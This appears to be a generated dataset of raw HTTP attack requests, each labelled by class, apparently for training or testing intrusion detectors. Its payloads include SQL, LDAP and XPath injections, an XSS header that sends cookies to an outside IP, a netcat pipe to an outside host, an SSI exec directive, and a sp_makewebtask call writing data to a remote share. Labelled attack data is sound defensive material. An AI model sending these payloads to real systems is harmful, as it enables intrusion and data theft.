Accept-Language: sh-6mtdO;q=0.8, c3Nd-eWs5ates;q=0.4, ao-wnN3on;q=0.9, e0oe-oe;q=0.8
Cache-Control: no-cache
Client-ip: 43.254.7.157
Cookie: ovzrne=hsae;Eas=/../../../Inetpub/iissamples/al/ns/nine/trllde.php;laeth=dsdshga
Date: Mon, 31 Jan 05 23:42:45 CET
ETag: W/"7Whex7ksVyEN-qcJHL"
Expect: 100-continue
From: h4leog@lneuabul.uk
If-Modified-Since: Tue, 09 Aug 05 16:35:11 GMT
If-Unmodified-Since: Tue, 17 Aug 04 10:30:57 GMT
If-Match: *
If-None-Match: *
If-Range: "vYuzDn8ACGVa9C.nQANC"
Max-Forwards: 6
MIME-Version: 8.3
Pragma: l='iOunetl'
Proxy-Authorization: NTLM bm85dHN0bmV3b3Z5YWF5dmxydEVmcGkxZG1nZWNuZWNyaA==
Authorization: Digest algorithm=MD5
Range: 78-,-3271
Referer: http://www.huriwd.fr/saoe.mspx
TE: gzip,chunked;q=0.6,deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.7 (Windows; U; WinNT 8.9; sz-or; rv:3.8.2) Gecko/50256406
UA-CPU: Sparc
UA-OS: Linux
Via: 5.1 www.EtalOhfg.shtml, FTP/3.3 www.f2Hin.gif:90
Transfer-Encoding: deflate
Upgrade: vysgb/3.2, qh8Atn/8.2
Warning: 820 150.29.252.130 "mcb2NdatgsdhTOusu2o" 
X-Forwarded-For: 225.208.230.238
X-Serial-Number: 30022157350213308791
~~~~~: ~~~~~~~~~~~~~~~~~

nOo=t&nnd2itni=uCtaccepterolnetcat$ipb &Acgsas=d&nslwUirneht=adesosngEoxef&gmesPvtabeuo=nyc&jbsjetc=ipaho4gottteehtd&2YGMA=nsAbtchhcnait&ba=5&ito=rJaff&xj8le=537175811&kTteiioai=oqt

End - Id: 45998
Start - Id: 49398
class: XPathInjection
GET /o7qd7z04/nCtTtDlSmeL86/nflaY.ODLL2.5G2/sfkyepfttQdfe/lxgvjyHon-wYel9/r1.gb/uASDX/eshzbKZIXN/lsqtknodeKQpnodern/ew@bpTKCxxLdQiGr/OT/jovGYElq7xmmq9hxY.htm?Oayc3udliapc=h%3E&won4xwwixeaf=lnnio3utrjxer&nNsrtiu=0529566&xteet=rcaNisr%3Bhrr&5u0aKZlhtpassY94position=104&ert49=uwj6F.UhbYIt&3GsZ-NEW=te%26i28x&nnf84nnHo9ibmay=76194&trs0uqelnj=74140764&insertYA@._ZHhttpvarsj=ra%27+or+++++%28i+%3C+count%28byeuai%2Fchild%3A%3Atext%28%29%29+and+++++j+%3C+++count%28lfo%2Fchild%3A%3Acomment%28%29%29+++and+k+++++%3C+count%28irlos1%2Fchild%3A%3A*%29+++%29+++++or++++%27ao%27%3D++++%27+8saoImr%27+++++or&erdfmeyknRoaxdi=6nprmGrcelseiu5m HTTP/1.1
Host: 212.10.234.143:980
Connection: keep-alive
Accept: audio/basic, audio/basic, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6DL1bom-4S3lv
Cache-Control: min-fresh=728
Client-ip: 239.142.160.110
Cookie: raee=dropmc;qicTiq=2e
Cookie2: $Version="461"
Date: Tue, 29 Jan 08 17:27:23 GMT
ETag: "pzzWYLc9y.a5zyTx8D"
Expect: egng4=ictu
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sun, 08 Jul 07 22:24:35 GMT
If-Unmodified-Since: Fri, 26 Feb 10 03:23:02 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Jul 04 20:23:54 CET
Max-Forwards: 5446
MIME-Version: 1.2
Pragma: nkrreZi='ons'
Proxy-Authorization: NTLM OXV0b2Zqb3NpZXN6ZmkwaUJ0dHVpc25jZG9hb3NmcHQ4dHJybnJzM05wMg==
Authorization: eva0ie ht0wn=itiroFtg
Range: 67912-847396,-254666,29-
Referer: /fdsu/tyor/n1Ni/q0xEpm.cfm
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/6.0 (Windows; U; WinNT 2.9; rx-tn; rv:6.2.1) Gecko/06642971
UA-CPU: StrongARM
UA-Disp: 2290,391,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6489x8625
Via: 0.4 www.uejfxj6.png, 4.2 www.aptodf.gif, 8.4 www.tozmn.css
Transfer-Encoding: thpat; fahT=D2hhew
Upgrade: goiteB/8.3
Warning: 260 86.25.83.250:0820 "hreojjeu" 
X-Forwarded-For: 71.48.20.140
X-Serial-Number: 37054990
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49398
Start - Id: 36957
class: LdapInjection
GET /PKj__Rc/Chomev0d/rytiozibsrvse/4W31EBYWC9Y/G3VrkP/wihLaeghsdtrsVeqe/ZLb@DlsizL/gsMg5C00JY0p58QXFA7A/ynlllhhe/ot3Hnm4yvzrdId4mea/aFbsVF7U-tNirOtm/inGR8hTedD.swf?VGPlHvXbE=%29++++%28+%7C++++%28displayName%3Dhad*%29%28name+++%3Dhad*%29%28++mail%3Dhad*%29&mraeHl3nde=0&kGptsp=4044&syr0=t-olAr&aaoAa=uymwtndfonl&IUMp=ui&OunionlocationuX5g=ae&jN=nM8i&sieje5=ao&nsedinni7wafa=1227551&eetlnhtcdbeh=fQfQgLWO&xM@XN6=0918569298&tehra2tgasr=tetas&QVD4psELKGylz=2887881 HTTP/1.0
Host: www.D6htesmrae.biz:80
Connection: keep-alive
Accept: video/mpeg;q=0.6, application/*, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: cl3g4m=8ar
Client-ip: 113.131.200.174
Cookie: hhltemi5rNg=ibiiys7nb;ids6ecnpaieur5=n7YM--5STEb;wyhtcot1lDs1kNk=sexecelraOatT;no7nox=567551720;uttibMysprrcaPz=xRo r
Cookie2: $Version="041"
Date: Sun, 28 Aug 05 07:02:58 UTC
From: qette0@etdR6.ch
If-Unmodified-Since: Wed, 28 Jan 09 18:05:54 UTC
If-Range: *
Max-Forwards: 4093
Pragma: a3=ui
Authorization: Basic dXFzZWxoZjpkaWlzU2Vt
Referer: http://www.xkopnels.com/etflnOF.png
TE: gzip;q=0.0,trailers
User-Agent: Mozilla/3.2 (Windows; U; Win98 2.9; ce-in; rv:9.9.2) Gecko/91723518
UA-Pixels: 8538x2200
Upgrade: sroaR/6.6, heg6/1.0, edrN/4.6
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36957
Start - Id: 46618
class: XSS
GET /nq206wsJztkx84ZQs@kI/ovlRSSNQzXqg0/rw/6.D3C/having@inserto/bU9scmdvarkDBri/NIJ2_/2o9etIqYv/g9wwbeieeiew.asmx?vD7B=45140&7Fnuzhfcatdr=83253832&2rdlmsDyot=a&dotxjle0bt=838649&aomxgoofioonda=dmEdnhpr9edosjaw&FF9cKd=o8R&itEoouEjeti=upOL%40a&ni=psaec&HgiSdsmtfw5s=587987&yc6b=7I%3Aa&ee=co%40stap&WID5Y2positioncopyaR=cde&wh8ee7ltrgdrry=1134335&tsuiov7gstv=hhtaccesoen&YEyeimtoe=ps%3Dh HTTP/1.1
Host: 102.212.68.78
Connection: keep-alive
Accept: audio/*;q=0.2, application/*, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: <xml src  ="  javascript:   [window.open('http://7.249.39.246/reenta.msf'+document.cookie);] "    >
Accept-Language: T1io-gdjnv;q=0.0, Asplv-tsutoae, nszeain-fv;q=0.2
Cache-Control: max-age=94
Client-ip: 166.217.253.140
Cookie: g6aocn=3304725;atitasbejitvh=efuleze9hpben;eyncb=pinsa;n76iEpt1eea1r=4415528938
Cookie2: $Version="489"
Date: Fri, 11 Dec 09 20:54:50 CET
ETag: "_ek5GFvMhnXVSDU6b"
Expect: 100-continue
From: aEly1e@etafje.gov
If-Modified-Since: Mon, 02 May 05 09:00:16 CET
If-Unmodified-Since: Tue, 28 Jun 05 23:55:39 GMT
If-Match: "E1g3EB@jpF33Xko_2PjU"
If-None-Match: "9-34yLvsJlOX_Pdw."
If-Range: "q50eA3iD0coTiyac_1fL"
Max-Forwards: 2186
MIME-Version: 5.6
Pragma: tvler50=rehdhipj
Proxy-Authorization: Digest response="d90C7D93CfbC9371Fdd2DB9114D0Bc1d"
Authorization: Basic Y2VUZW9qOnN0a3Jv
Range: 7283-8
Referer: /karnqnt/avcAm/i1ld.js
TE: chunked
Trailer: If-None-Match
User-Agent: Mozilla/0.1 (compatible; MSIE 9.2; Mac OS X; parapeAuI; obil4; dkuii)
UA-CPU: x86
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: 6.0 www.gohtm3zz.css, 6.7 www.abtha.png:7, 1.8 22.102.132.242
Transfer-Encoding: compress
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 476108611039
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46618
Start - Id: 44650
class: PathTransversal
GET /aZT3U/mlaWss2esfebp/oRDn2onuL7Ph/ednjt3e7ybiMxe5tshhe/styh3whE.css?yFRKuNt112=09&opceegmamcseynm=%2BtVserc%3Es&8sAehnef4=69235808&eeyr=vxweoEPa6s9a HTTP/1.0
Host: www.Ehgeeeikrn.de
Connection: keep-alive
Accept: text/*, text/plain;q=0.2, video/mpeg;q=0.8
Accept-Charset: iso-8859-5;q=0.4, iso-8859-6;q=0.6, x-mac-icelandic, x-mac-arabic;q=0.9, x-mac-japanese
Accept-Encoding: gzip, gzip;q=0.0
Accept-Language: *
Cache-Control: max-age=2267
Cookie2: $Version="5"
Date: Thu, 15 May 08 13:56:20 UTC
If-Modified-Since: Fri, 26 Oct 07 15:23:28 UTC
Max-Forwards: 796
Pragma: no-cache
Authorization: hseh 1r7qih=ApGsE
Referer: http://www.osehsth.org/EntNs/aEHponU.rar
TE: chunked,trailers,trailers
User-Agent: doc(    file:///c:/ofrti/seq.xml  )
UA-Disp: 547,072,16
X-Forwarded-For: 52.237.224.178

null

End - Id: 44650
Start - Id: 42544
class: SqlInjection
GET /aMcPG5nvc/puimp0derntdts/6positioni/Resogaan1r/ntx6i.php4?Edj7Erhaccn=htht0echonnvohcrF&piabeiR4Ixnni=%27+++OR+++++%27otfesoah%27+BETWEEN+++++%27R%27++AND+++++%27T&ozbQSY=e&Rsiu8=eLrAURA9zC&_Zai=4472987247&Rsweca9h8te=%2F%3C&0hd9oetea8ta=jO2.LUPdCZYN HTTP/1.0
Host: 154.145.15.43
Connection: keep-alive
Accept: image/gif;q=0.1, image/*
Accept-Charset: x-mac-arabic;q=0.6
Accept-Encoding: identity, deflate;q=0.0, deflate;q=0.4, gzip;q=0.2, deflate;q=0.9
Accept-Language: hr2rwi-et, xPsccn4-k
Cache-Control: only-if-cached
Client-ip: 15.200.32.132
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="1"
Date: Sun, 18 May 08 04:10:50 GMT
ETag: "kPAxt3XJmAHvS2nITL"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Wed, 07 Nov 07 09:40:23 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 84
MIME-Version: 3.7
Pragma: rdhie=tvS
Proxy-Authorization: NTLM ZW9hbnRtYnlsRXN0c3BBYXR5ZzhTczhhM29Fb3NvcGQ=
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 79786-446
Referer: http://28os.be/pdeh/dpc8r2o/oeu4i.pdf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/1.3 (Machintosh; U; Mac OS X 9.5; Ee-ir; rv:6.1.8) Gecko/70994048
UA-CPU: x86
UA-Disp: 591,320,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: 7.7 www.salfoeT.png, 0.2 www.1lrhr.css, HTTP/4.2 87.92.174.85:17978
Transfer-Encoding: compress
Upgrade: aehy/9.2, etyl/6.6
Warning: 563 www.aePi5.gif "edicbUoeitewfnmtlui" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42544
Start - Id: 43208
class: OsCommanding
GET /eX7DUyU3ZGdR5boY5/r-GfQX/uFw3cFTPOYBtn/rgraelNwo.tiff?srlhd8erwNhae4x=%7C++%2Fusr%2Fbin%2Fnc+++++-vvv+++100.190.148.109++80%2500&eettdvArd0sk=274&Di=tmptekookobjectdfn HTTP/1.0
Host: www.oiwio8.ch
Connection: mulRTmk
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: e=ta
Client-ip: 59.228.253.1
Cookie: Ins=7
Cookie2: $Version="350"
Date: Sat, 29 May 04 16:26:48 GMT
ETag: "XR31.2u_UhvXSfees"
Expect: nits
From: ae6na@rbiuoetitt.st
If-Modified-Since: Thu, 25 Sep 08 02:25:56 GMT
If-Unmodified-Since: Sun, 06 Jan 08 03:50:28 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 722
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: NTLM c2FjdGVhaTg0aW9hMmNpcm8yQ2FyYWh4b3VjdDR1N2VlOHVJYQ==
Range: 66907-4
Referer: http://www.rara3n.fr/eeipe/eotgsal/idrkC1r.css
TE: deflate
Trailer: Connection
User-Agent: rS0omAV7o http://www.g0altTo.gov
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 953x846
Via: Eo3t/2.6 180.34.222.135, FTP/5.1 www.h6cCDsln.js
Transfer-Encoding: ncrazu; eia7=j9fe9
Upgrade: cieon/9.6, fEu/4.3, uUa/0.7, eme/1.4, aopoq/1.0
Warning: 067 www.whHhen8.tiff:01 "nyi9rr1Caal" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43208
Start - Id: 36403
class: OsCommanding
GET /WjmochaLLrprocessing-instructionFb2/asj3d4qHSs/nluW3nf/0adOg/28p9hiq/3dXE/sHI6@2q/ogaipbcsbmfns/viiaaar/gSNnO@/eXMp6fVAs/nGM.t.asp?cCl3EchildHVZ77=rt&podtmEhl=raaQEafsbil16es&nbl=NbDm&PkLG=s6eOJAHm&ontt0q1lo=lst&c8g174de9Eeqnu=626&xbeEsht5=vQs7gBCNqiD&irDCoptscriptUNR=209675&nssetteennsrtt=c%29o&ee6seh=n%29&ea=2197998885&elDenxr=4919&ntb3uslo=raipnsse%3C0lqcm&nAr7oomatgl=eknear&eihes6rtarSohwi=%27%3B++++EXEC++master..sp_makewebtask+++++%22%5C%5C48.43.255.29%5ChuuleDi%5CYweei.jpeg%22%2C++%22SELECT++*+++++FROM++++INFORMATION_SCHEMA.TABLES%22 HTTP/1.0
Host: www.anVnSseb.ch:80
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: euc-cn;q=0.4, iso-8859-8-i
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 223.164.71.64
Cookie: em=oe8fo3bioednttie;Eiobliuta=iePtqi;usenrxr=45353475
Date: Sun, 01 May 05 13:38:24 UTC
If-Modified-Since: Wed, 15 Nov 06 18:12:26 GMT
If-Match: "mraU4plO@YrjbvId85k1"
If-None-Match: *
If-Range: Sun, 13 May 07 24:50:40 GMT
Referer: http://www.tszetisa.gov/rxObd/s8o7s/hu5e3/oxnd/gyiactye.shtml
TE: trailers,deflate
User-Agent: gtnrao
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
X-Serial-Number: 3132284615
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36403
Start - Id: 42800
class: OsCommanding
GET /b./ausyuhslnlmee/sI_O@6_bW/ctottegiedy/9aUnc/ad7e6/0_UJJtk83U/opM/vuNbSiframeTHXYbB.jpg?ufQT=isnaR9idmiMbuw&el4sUidptyuBd=hmio1Eeootagqn&ahtasile=oxneon&SA=tyApBj&wtaTsfsezh=832940&hbreo=ail&cya=i+dtetlshutdowncataerechot%24no HTTP/1.1
Host: 10.215.133.4:80
Connection: close
Accept: text/xml, image/*, audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: ie-jshiev;q=0.4, d6-h, nn2nzrin-wbxssa;q=0.2, iar-r1Rtc;q=0.8, ggcutn-5rREca
Cache-Control: no-store
Cookie2: $Version="869"
Date: Sat, 12 May 07 11:16:10 UTC
If-Unmodified-Since: Tue, 20 Jul 04 03:43:06 UTC
If-Match: *
If-None-Match: "Ghzz_Aw5p0pEDjS13"
Max-Forwards: 799
Proxy-Authorization: Digest response="F531DDD5A24E995fc09BDaC7f5fFdc4e"
Authorization: NTLM bXNub25laWFoaDF0MXhTZDU3cm50bXNydzJudXE1cWRlZW5hZWVz
Referer: http://www.cmtl.fr/otvyeRf/uRtR3ie.msf
TE: chunked;q=0.0,trailers
Trailer: TE
User-Agent: 16.32.57.168    |  dir+c:\
UA-Pixels: 4444x6444
Via: hzes/7.8 108.211.80.164, 6.4 www.gkaonra.css
Transfer-Encoding: iSty

null

End - Id: 42800
Start - Id: 39017
class: LdapInjection
PUT /3oYk75-@h-81FAwJfs3Q/0Gdt1ejljsrep0o1.htm? HTTP/1.1
Content-Length: 17
Content-Language: ttiyeHgp,Tfaokh,1sTsnEee
Content-Encoding: gzip
Content-Location: http://www.1cle9.be/dshn/lamgv/h3usA/dsl3/Rcri.conf
Content-MD5: dVplaXM4c25uc2F0d3I2Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Sep 06 13:53:14 CET
Last-Modified: Sat, 10 Jan 04 10:41:06 GMT
Host: 36.233.162.178
Connection: close
Accept: audio/basic, image/png;q=0.2
Accept-Charset: koi8-r;q=0.0, iso-8859-3
Accept-Encoding: )   (   |   (   cn=*o'brien*   )(mail =*o    'brien*   )  
Accept-Language: na)(  |(10=*)
Cache-Control: no-store
Client-ip: 103.25.9.144
Cookie: ds1ube7itTcd=eH3hEr5e0wlovu;hhiwsleoftghea=eNb95lx;AD3=44;767Ioru=9787997;6y=44632713
Cookie2: $Version="997"
Date: Mon, 31 Jan 05 15:09:32 GMT
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: rtYnihG@mn4eem.gov
If-Modified-Since: Tue, 04 Mar 08 09:45:23 GMT
If-Unmodified-Since: Sun, 05 Aug 07 02:35:06 UTC
If-Match: "Zg44Z2A.QOrP0I8b"
If-None-Match: *
If-Range: Fri, 16 Sep 05 10:46:55 UTC
Max-Forwards: 19
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: higIf erheDet0=wxdkigne
Authorization: NTLM dWh1aXJocWVpYXllcnJoczhwb2VFc25kZHNUNGxpbG1lZXNs
Range: -085
Referer: /dhns/ensxr/toeedm/xen9ln/aisio.htm
TE: chunked,chunked
Trailer: User-Agent
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 7.5; cn-hS; rv:4.6.6) Gecko/32607792
UA-CPU: 68000
UA-Disp: 744,650,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 960x5747
Via: HTTP/5.0 7.158.58.54:16105
Transfer-Encoding: identity
Upgrade: yuanig/5.9, tImh/5.1
Warning: 562 166.100.218.31 "elnelas" "Mon, 19 Dec 05 03:33:45 UTC"
X-Forwarded-For: 236.228.179.215
X-Serial-Number: 13381334
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

edoicseeu=oarbO_q

End - Id: 39017
Start - Id: 49545
class: XPathInjection
GET /aL2efmtzg/pFuqXMkI6dII7execV/soteyimtnrqyhrbs/rlZ-5TDRK86OXR9BOFB/syxDbEkmwRPXodf@nA/gg-DCwX-Lyo/eRar.dll?vtrUneivss=lAbn&moCnmailTfhp5jz=eDcd&stbe5ea=u7pNeiont&on=0627742&eA8mb4an=88+++++or+++++1%3C+++rMlcr%2Fns%2Fsyeais%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+or+0%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&uiss4zauiO=300357835 HTTP/1.1
Host: 244.117.218.0
Connection: krroxdi
Accept: video/mpeg;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.6, identity;q=0.1, identity
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 74.98.44.206
Cookie: OPrE0Gp7uETf=mhlnktr8wutldeldoy;unurue=7417;i2E9titli7if7=adshome;eLie2Qx=>
Cookie2: $Version="293"
Date: Sat, 14 Feb 04 21:57:46 CET
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: ay2otsbp=eltj
From: wirtsy@nexe4eht.ch
If-Modified-Since: Sat, 01 Nov 08 02:11:46 UTC
If-Unmodified-Since: Sat, 29 Sep 07 22:20:32 UTC
If-Match: *
If-None-Match: "tsARRZlvDUyF3_L"
If-Range: "uyvizx1f_Zj3yIKKqm"
Max-Forwards: 4
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cm1Cbm5naWx0Y2FzcEdob3RyYTJrbDBlOW5udWNlZXJiY29ibnN1c2FzeW9hemM=
Range: 781-900781,-7359,99112-
Referer: /ilsbmR/eern/ehsihnr/nukohonl.png
TE: gzip,deflate,chunked;q=0.8
Trailer: Accept-Charset
User-Agent: aFZSsl4n8 http://www.raoeso5o.com
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9192x115
Via: rvo/4.7 www.mrs0fNie.css:3, FTP/6.7 www.s1Id.htm, 6.2 www.mhaGsnAo.jpg
Transfer-Encoding: oeesmh
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49545
Start - Id: 35451
class: SqlInjection
PUT /2XYF.Wby3EI8_G2_/rkIWd7GfUElE9G1/e6nRyMBY0AhCpU/263x41aewzSE/axrt/bO/ofn7nitsnil0rl/N.A92OBEetc/rbgn-biYW-D.exe? HTTP/1.1
Content-Length: 88
Content-Language: ocuts1r,tAit,2s
Content-Encoding: identity
Content-Location: /erupht7.swf
Content-MD5: dGdhZWFEbGQ4WG5mYW92cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 May 07 17:56:31 UTC
Last-Modified: Wed, 19 Sep 07 13:25:24 CET
Host: 248.41.184.108
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.4, gzip;q=0.7, deflate, deflate;q=0.7
Accept-Language: *
Cache-Control: max-age=273
Client-ip: 12.196.211.25
Cookie: e1NnhE6ttpxyONf='    )  UNION     ALL    SELECT    'ewjBe',7716,6,'agile7u',62   FROM  auqhdi  WHERE  (  ''=    ';eIcmrfeuiorR=tstdintmpn:;m1atociogatz=n;yi3iaeeTleso5cT= boot.iniiel;kadnbjnTk9nu=524496;8i=560507
Cookie2: $Version="8"
Date: Thu, 08 Jun 06 24:09:28 CET
ETag: W/"akIhQlOFCbJjvrD"
If-Modified-Since: Tue, 13 Apr 10 02:34:24 CET
If-Match: *
If-None-Match: *
If-Range: "ER9Y3mkq51u0ZLlMdWor"
Max-Forwards: 5
Authorization: tOotft a5Ytnti=8nRn3LnS
Referer: /bmzotyw/loEaotry/rgwlT/cIrHErm.gz
TE: deflate,trailers,chunked
Trailer: Proxy-Authorization
User-Agent: ri73i/9.0.7
Via: FTP/8.6 98.37.139.181
X-Forwarded-For: 142.47.121.158
X-Serial-Number: 8721257248

lu8K3=T@&hgawctaSpMn=00gla>es&tjIceinaznnging=0>i]nyErs4e ra&en1sm9=acobnMawhkee

End - Id: 35451
Start - Id: 40058
class: SSI
GET /a59/rYtw7cpi/e5JnAf2ZhICRmh/pfrpnseipebpgelr6/eME/eia9nmiwdoapdipi/5BhavingS/gitAhaee89oehr7/jyg2Z3dw0N2DvN.bin?pp=a4Uvs6cXU&odneewnoieheqbh=b&ne6=%3C%21--++%23exec+cmd%3D%22%2Fbin%2Fls+-l+++++%2Fhome%2Foi%2Fmtwriwh%22++++--%3E&n2=sDlFOOwd&AtA=m6kno45ugh%3Eea&eoci=hotaeaea&hel1ctS=ouh%29 HTTP/1.0
Host: 101.247.150.160:80
Connection: close
Accept: video/mpeg;q=0.0, video/*, image/png;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.4, deflate;q=0.5, identity;q=0.3
Accept-Language: bKre-sEq, est-rHaedo
Cache-Control: max-stale
Client-ip: 49.156.66.129
Cookie: dnreErefohsidme=rmtpIn;danyaitgL=3s+zenhb;zinVQqm%u=%3A%29oaa6havingei3ucoiitx%28t;TFF_K=020;a0kaz4pa=4067;ctcgg0g=Esed
Cookie2: $Version="57"
Date: Fri, 06 Jan 06 14:00:49 GMT
ETag: "E13puIippJH_MZisUTlR"
Expect: 100-continue
From: atth5@DlahcYr4ai.cz
If-Modified-Since: Wed, 18 Feb 09 16:32:03 CET
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: *
If-None-Match: "_YaU.F4EyvQ9@zdv0"
If-Range: Thu, 05 Feb 09 08:07:20 UTC
Max-Forwards: 173
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM bmVtZWRlNGJvcG1nc2VNY3Z2ZWU0ZWI0c29sYXRuRW0xb2hzbjBrZ3Rzcw==
Authorization: NTLM bmxub0pkRHN3ZHRuYWlsYXJ0dXIzbm9udGNNNmlpcm9oaGlmcmVyNmVpZEFTc2ll
Range: 8082-34430,77209-030140,-38
Referer: http://www.lo3Ii.cz/olee3W/eIbnro/adoit82/srbsn/okrondim.avi
TE: chunked;q=0.0
Trailer: User-Agent
User-Agent: usnmVriNakBeisgThS
UA-CPU: PowerPC
UA-Disp: 098,0653,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8002x1361
Via: FTP/7.2 www.qspe.jpg, FTP/7.1 www.tuee9.jpg, HTTP/8.9 www.eeiga.png
Transfer-Encoding: 9eadrs
Upgrade: eyee/8.5, tmg/7.0
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40058
Start - Id: 47756
class: XSS
GET /i5gmsihaTtnastam/eQScb5gi.K0.yL/AEposition_BrE/aeaefxxsir3/Nqp/igabino0p361/tPvXGKF0R-/es9Ls.cfm?r7aneIrc4=44&ia2=o%3A&lusaa=s2ioltehta&urstern=sdgr2ti&CVC2yAopenbM=+Yrw1c%274teepte%27+na&c4ryidiansd=Xthp&nY9link23LmailB_Co=7mpqe&anqutk7=17751&R5cposition=%3Cdiv+++++style++++%3D+%22+++binding%3A++url%28%5Bhttp%3A%2F%2Fwww.anenoror.com%2Fscript%2Fogl.mdb%5D%29%3B+%22++%3E&catwmtSaD=27&hc1=h2QpZrY7 HTTP/1.0
Host: 22.44.232.201
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-turkish;q=0.5
Accept-Encoding: *
Accept-Language: ace-ih
Cache-Control: no-store
Client-ip: 244.205.136.111
Cookie: eceyee=9079492328;os6=nNC._9Cu1hZG;l3ysafmbX=rnpcoraus
Cookie2: $Version="9"
Date: Fri, 12 Feb 10 10:40:48 UTC
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: davs@c0hut1.uk
If-Modified-Since: Tue, 05 Oct 04 20:59:43 CET
If-Unmodified-Since: Sat, 07 Mar 09 21:57:07 UTC
If-Match: *
If-None-Match: *
If-Range: "FfiN_DWQ5bd8SbPU"
Max-Forwards: 8
MIME-Version: 7.7
Pragma: e0v40ti='sL'
Proxy-Authorization: Basic dW55dDplbndoaWJj
Authorization: NTLM ZWV5bDVoaW41cmVldWJhd1RvZUQzdGVsb0JVYWVsZzBzNmE=
Range: -41921,082-
Referer: /Aqb4ts.msf
TE: deflate;q=0.4,trailers,deflate
Trailer: Date
User-Agent: Mozilla/1.0 (compatible; MSIE 0.0; Linux i386; hwuuocge; reYrce; ni084)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: wlfe/1.9 www.cqtJnru.js, 8.7 74.54.253.242, 4.0 95.121.132.173
Transfer-Encoding: seuAre; pfrGtM=tirrw
Upgrade: 4MX/4.5, oSoes/3.8, tmVhya/8.9, naep9a/7.9, 2rjisu/4.2
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 47756
